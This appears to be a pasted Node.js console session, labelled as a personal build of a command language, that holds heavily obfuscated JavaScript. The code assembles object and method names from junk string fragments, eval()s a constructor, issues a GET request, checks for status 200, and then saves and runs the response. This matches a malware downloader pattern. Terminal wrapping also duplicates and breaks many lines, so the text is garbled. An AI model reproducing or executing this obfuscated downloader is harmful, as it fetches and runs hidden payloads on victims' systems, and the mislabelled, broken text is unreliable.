-My build of DIGITAL Command Language:
-Muhammad Adi Nugroho,S.Adm.Neg.:
-Via My Notepad++ (HTML Editor):
-Via Node.js:
etetki5                              etycyc7
events                               evmulvubu0
evwamenu                             ezpuzyxba6
ezvubacgi                            ezyje6
fbexmefolb3                          fbuggagpe0
fs                                   gjymfyrp
global                               guqyha
gxyri                                hiwjymu0
hmafy7                               hmyci8
http                                 https
hyxecynz                             idpota5
igis                                 ihwyjt2
imvafihq                             iwdufwese
iwiranju                             ixykidgo
jfysukuj5                            lecujibl
lovbybom                             mhyhylo
module                               myha
mypqe                                net
nfycifa7                             ofate9
okacvice3                            okhosqa
omudc1                               oncalkep6
onydso4                              os
otwuzj                               owmovfekw
oxadzoms                             oxwogq
ozgomyl8                             ozomp1
path                                 pcizgabol
process                              punycode
querystring                          readline
repl                                 require
riwvuja5                             setImmediate
setInterval                          setTimeout
soxlah                               spuzyhxirr
stream                               string_decoder
stybcolkilx3                         tefyrfipp6
tls                                  tpulyhzu6
tty                                  ucqihcud7
ufytynk7                             ugaw2
ugexe6                               ujism
ujkikcyh0                            uqkugb1
uravk7                               urjywzu6
url                                  util
uvnasybva                            uwtaxhe
v8                                   vm
vorpyzfa1                            vrehaza
vsojobqatg0                          xrapid
ybanmok                              ybnor
ycasc                                ycaxono4
yfif                                 yjkawd
yjtevybgu9                           ymrerigq
ynwylqazx                            yqaryxx
ytxewo                               yzlyvg
zdixuti                              zifo5
zlib                                 znomygfel
zxesnaqc5

__defineGetter__                     __defineSetter__
__lookupGetter__                     __lookupSetter__
__proto__                            constructor
hasOwnProperty                       isPrototypeOf
propertyIsEnumerable                 toLocaleString
toString                             valueOf

... var snagyregb5 = [];
...     snagyregb5["exowygw"] = 'iroxmurk';
...     snagyregb5["mtobpormo"] = 'gyqpin';
...     snagyregb5["ivesugky"] = "onehof";
...     snagyregb5["dhojafixc"] = "izima";
...     snagyregb5["ymjudytx"] = '\\\\';
...     return snagyregb5["ymjudytx"];
... }
undefined
> function yzjekteml2() {
...     var jtiru4 = ["yhvamiq", "72940", "43000", "leS"]
...     return jtiru4[3];
... }
undefined
> var gboke = ["t", "zcojju", "75735"];
undefined
> var jruluvdo = ["ct", "93482", "doqbivol", "83229", "gicorqyjt", "wokozx", "17
608"];
undefined
> var jqifxox = ["lonodd", "dyrefbyp", "10120", "le"];
undefined
> var kejare3 = ["ugwevu", 'Scr'];
undefined
> var xpefiz = ["ydag", "bbocy", "94479", "/fr", "arelumdu", "mugi", "31936", "u
hquqyx"];
undefined
> var uxqerbi = ["58169", "97635", "bje", "80196"];
undefined
> var artuqwu = ["58715", "74389", "93293", "unhobuma", 74, "46361", "ebzebw"];
undefined
> var ifuziti0 = ["ijwypejno", "52811", "ghukmac", "ezovubge", "aruxanmi", "onse
hoz", "Ac"];
undefined
>
> function urqorzyrn() {
...     var axixhewwe4 = [];
...     axixhewwe4["medexysr"] = "zdokvo";
...     axixhewwe4["wtilxegju"] = "ozite";
...     axixhewwe4["hunmukocz"] = "oqkibvy";
...     axixhewwe4["spovik"] = "Get";
...     axixhewwe4["fkejyxvah"] = "asjob";
...     return axixhewwe4["spovik"];
... }
undefined
> var pzujxavin6 = ["41432", "ody"];
undefined
> var ujyp9 = ["qopuc", "ibgehlotn", "on"];
undefined
> var vtyldawbol4 = ["98986", "batboqfod", "85684", "58165", "Ty", "21927", "ahi
gl", "zmizafpaz", "racajpi"];
undefined
> var cfudu = ["ilvot", 391, "tzufdy", "79266", "28902"];
undefined
> var axfujyp = ["omtupq", "pazcu", "pida", "B.", "yblikz", "35026", "31456"];
undefined
>
> function lyzlizp() {
...     var uvidu5 = ["nbemho", "72902", "22080", "coxybse", "vqoryde", "sperkah
...     var uvidu5 = ["nbemho", "72902", "22080", "coxybse", "vqoryde", "sperkah
, "81360", "am", "ojeqz", "yruljazm"]
...     return uvidu5[7];
... }
undefined
> function ykyzdewi() {
...     var ucmepb9 = [];
...     ucmepb9["bukfy"] = 'ajwaci';
...     ucmepb9["xaxzexmo"] = 'bywgo';
...     ucmepb9["tbywifkyh"] = kejare3[1] + gjymfyrp[0] + uravk7() + cdebgubdidm
...     ucmepb9["tbywifkyh"] = kejare3[1] + gjymfyrp[0] + uravk7() + cdebgubdidm
+ fbuggagpe0[0];
...     return ucmepb9["tbywifkyh"];
... }
undefined
> function sqifqymwo() {
...     var qtopufh1 = [jfysukuj5[0] + alyrto(), "78045", "ipbunukde"]
...     return qtopufh1[0];
... }
undefined
> function ohorekso6() {
...     var ykhofs4 = [];
...     ykhofs4["xguvabqegw"] = 'efryjbi';
...     ykhofs4["iwzys"] = "zxisu";
...     ykhofs4["wasyt"] = 'yqwotpe';
...     ykhofs4["ypahe"] = vtyldawbol4[4] + mhyhylo[2];
...     ykhofs4["ojuge"] = "teqsojy";
...     return ykhofs4["ypahe"];
... }
undefined
> function akramwu() {
...     var olazgov8 = ["78811", "51366", "ilgex", "otusygti", imvafihq[0] + ymr
...     var olazgov8 = ["78811", "51366", "ilgex", "otusygti", imvafihq[0] + ymr
gq[0] + onydso4[3] + ycasc() + ybnor() + ytxewo[1], "fbifuzd", "okypto"]
...     return olazgov8[4];
... }
undefined
> function avweqwajv0() {
...     var qticir = [];
...     qticir["mkusopn"] = "regcipu";
...     qticir["kcisje"] = urqorzyrn() + ezyje6[1] + stybcolkilx3() + soxlah();
...     qticir["opmif"] = "uhcucgi";
...     return qticir["kcisje"];
... }
undefined
> function axoly() {
...     var vyknag = [];
...     vyknag["bcelisevs"] = "ylvufel";
...     vyknag["cryta"] = eqora1() + emzirivge();
...     vyknag["ixtonlu"] = 'ewidpy';
...     vyknag["wozejibk"] = 'gatgaci';
...     return vyknag["cryta"];
... }
undefined
> function nyni() {
...     var ujkonu8 = [];
...     ujkonu8["esgol"] = ezpuzyxba6() + hmafy7[3];
...     ujkonu8["ykibxa"] = "diqfixly";
...     ujkonu8["vfyrefo"] = "ofjilwe";
...     ujkonu8["xyfo"] = 'ebniro';
...     ujkonu8["sydme"] = "baza";
...     return ujkonu8["esgol"];
... }
undefined
> function nelyk7() {
...     var zyzje2 = [];
...     zyzje2["nlujvibvo"] = "elukro";
...     zyzje2["hfidgi"] = "wultogv";
...     zyzje2["yqobqo"] = "bwykit";
...     zyzje2["sfobtisojj"] = lecujibl() + znomygfel() + etetki5[1];
...     return zyzje2["sfobtisojj"];
... }
undefined
> function ygiqbo9() {
...     var osumty8 = [spuzyhxirr() + ujkikcyh0() + ujyp9[2], "74176", "87735"]
...     return osumty8[0];
... }
undefined
> function yplasqe0() {
...     var lehocdicn = [];
...     lehocdicn["awonevj"] = 'narja';
...     lehocdicn["agoby"] = nfycifa7[8] + uqkugb1();
...     lehocdicn["yfosune"] = 'igxizc';
...     lehocdicn["asip"] = "mvanwac";
...     lehocdicn["alik"] = 'ocvify';
...     return lehocdicn["agoby"];
... }
undefined
> function ufzafxuvh() {
...     var ekosakc8 = ["79994", "jtunov", "67699", "69599", afemlaxl0[8] + ujis
...     var ekosakc8 = ["79994", "jtunov", "67699", "69599", afemlaxl0[8] + ujis
] + amum() + pzujxavin6[1]]
...     return ekosakc8[4];
... }
undefined
> function barheg3() {
...     var yhyzh = [];
...     yhyzh["yfsazdy"] = ekzevs[3] + tefyrfipp6() + yzlyvg[0] + okhosqa[4] + j
...     yhyzh["yfsazdy"] = ekzevs[3] + tefyrfipp6() + yzlyvg[0] + okhosqa[4] + j
xox[3];
...     yhyzh["xyhilja"] = "onbylbug";
...     yhyzh["ibaga"] = "matdi";
...     return yhyzh["yfsazdy"];
... }
undefined
> function aridto() {
...     var isiqq9 = ["50383", "lcenzac", "dcekvira", edip7() + hyxecynz[0], "yp
...     var isiqq9 = ["50383", "lcenzac", "dcekvira", edip7() + hyxecynz[0], "yp
b", "lcitev"]
...     return isiqq9[3];
... }
undefined
> function ogujhaky() {
...     var ujumfe9 = ["57292", "pufa", asgyzmi[3], "37346", "72805"]
...     return ujumfe9[2];
... }
undefined
> function xyqzu1() {
...     var gnofmac = [];
...     gnofmac["pofyc"] = "fypivz";
...     gnofmac["yqxarorf"] = 'jytuzp';
...     gnofmac["ibyfuvr"] = 'ezalwywl';
...     gnofmac["dnabiwi"] = oxadzoms[0] + yfif[1] + igis() + ufytynk7[6] + ynwy
...     gnofmac["dnabiwi"] = oxadzoms[0] + yfif[1] + igis() + ufytynk7[6] + ynwy
zx();
...     gnofmac["degqiq"] = 'wijygny';
...     return gnofmac["dnabiwi"];
... }
undefined
> try {
...     var sxefiw0 = idpota5;
...     if (!sxefiw0[ihwyjt2[1] + vorpyzfa1[2] + zifo5() + lovbybom[4] + ofate9(
...     if (!sxefiw0[ihwyjt2[1] + vorpyzfa1[2] + zifo5() + lovbybom[4] + ofate9(
yqaryxx[2] + owmovfekw[6]][oncalkep6[5] + riwvuja5()]) {
.....           var dwiduco = eval(ifuziti0[6] + bwypu[3] + etycyc7[0] + evmulvu
.....           var dwiduco = eval(ifuziti0[6] + bwypu[3] + etycyc7[0] + evmulvu
ugexe6[1] + hmyci8() + gboke[0]);
.....   }
...     var qnena3 = myha() + hiwjymu0() + erduvukvu() + ybanmok() + vsojobqatg0
...     var qnena3 = myha() + hiwjymu0() + erduvukvu() + ybanmok() + vsojobqatg0
();
...     var akfubnawd0 = mypqe[1] + omudc1() + iwdufwese[3] + iwiranju[2] + yzje
...     var akfubnawd0 = mypqe[1] + omudc1() + iwdufwese[3] + iwiranju[2] + yzje
ml2() + oxwogq() + urjywzu6() + uxqerbi[2] + jruluvdo[0];
...     var efzymf2 = amfevy0[1] + ucqihcud7[1] + otwuzj() + ecpyxi9[4] + cmatcy
...     var efzymf2 = amfevy0[1] + ucqihcud7[1] + otwuzj() + ecpyxi9[4] + cmatcy
[0];
...     var qculy0 = new dwiduco(qnena3);
...     var ejlypzefeb = new dwiduco(akfubnawd0);
...     var uvlegmik6 = cefna[0] + ecpiwid3[1] + axfujyp[3] + ozomp1[6] + ajxuhn
...     var uvlegmik6 = cefna[0] + ecpiwid3[1] + axfujyp[3] + ozomp1[6] + ajxuhn
u[5] + lyzlizp();
...     var fjuxujyqbi = new dwiduco(uvlegmik6);
...     var orywi = sxefiw0[ykyzdewi()];
...     var fpyte = aggikt2() + bivwy[1] + xpefiz[3] + tpulyhzu6() + uwtaxhe() +
...     var fpyte = aggikt2() + bivwy[1] + xpefiz[3] + tpulyhzu6() + uwtaxhe() +
 csisudi5() + zdixuti[0] + ixykidgo() + ugaw2() + yjtevybgu9() + gxyri() + fbexm
lb3() + okacvice3[0] + alkypvy0();
...     fjuxujyqbi[sqifqymwo()]();
...     fjuxujyqbi[ohorekso6()] = zxesnaqc5[3] - egysrytni6[3];
...     var umucudbydn7 = ejlypzefeb[akramwu()](ozgomyl8[8] - 384) + nilubyv4()
...     var umucudbydn7 = ejlypzefeb[akramwu()](ozgomyl8[8] - 384) + nilubyv4()
jlypzefeb[avweqwajv0()]();
...     qculy0[axoly()](yjkawd(), fpyte, vrehaza[0] - 366);
...     qculy0[nyni()]();
...     if (qculy0[nelyk7()] == cfudu[1] - 191) {
.....           fjuxujyqbi[ygiqbo9()] = xrapid[0] - ezvubacgi[7];
.....           var itikku = new dwiduco(efzymf2);
.....           var sifehza = uvnasybva[2] + guqyha() + pcizgabol() + evwamenu[0
.....           var sifehza = uvnasybva[2] + guqyha() + pcizgabol() + evwamenu[0
udbydn7;
.....           fjuxujyqbi[yplasqe0()](qculy0[ufzafxuvh()]);
.....           fjuxujyqbi[barheg3()](umucudbydn7);
.....           fjuxujyqbi[aridto()]();
.....           itikku[ogujhaky()](sifehza, vrehaza[0] - 366);
.....   }
...     ejlypzefeb[xyqzu1()](orywi);
... } catch (jgarunwi) {}
undefined
>
